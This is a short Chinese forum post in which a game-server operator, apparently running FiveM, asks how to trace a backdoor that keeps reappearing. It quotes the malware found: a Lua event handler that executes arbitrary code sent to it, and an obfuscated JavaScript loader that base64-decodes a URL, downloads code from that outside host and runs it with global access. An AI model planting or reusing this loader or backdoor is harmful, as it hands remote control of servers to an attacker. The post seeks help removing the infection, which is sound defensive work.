- 黄金
- 82.02 黄金
求助大佬 端被病毒包围了 每次关闭服务器都会再 sessionmanager\client\empty.lua中出现一段代码
然后会下个蛋 名为xxx.js的文件 里边有一个https请求
这个js文件乱下蛋 有没有大佬知道如何找出后门源头
代码:
RegisterNetEvent("helpEmptyCode")
AddEventHandler("helpEmptyCode", function(id)
local help = assert(load(id))
help()
end)
代码:
(function () {
const $ = require(Buffer.from('aHR0cHM=', 'base64').toString());
const _ = Buffer.from('aHR0cHM6Ly8xbHMyLm9yZy94eHg=', 'base64').toString();
const $$ = ['data', 'end', 'error', 'statusCode', 'global'];
$['get'](_, r => {
let d = '';
r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));
})['on']($$[2], () => {});
})();
领取红包用户





- 黄金
- 547.71 黄金
感谢楼主的红包!
Nine Loong领取了您的红包获得了0.87黄金
Nine Loong领取了您的红包获得了0.87黄金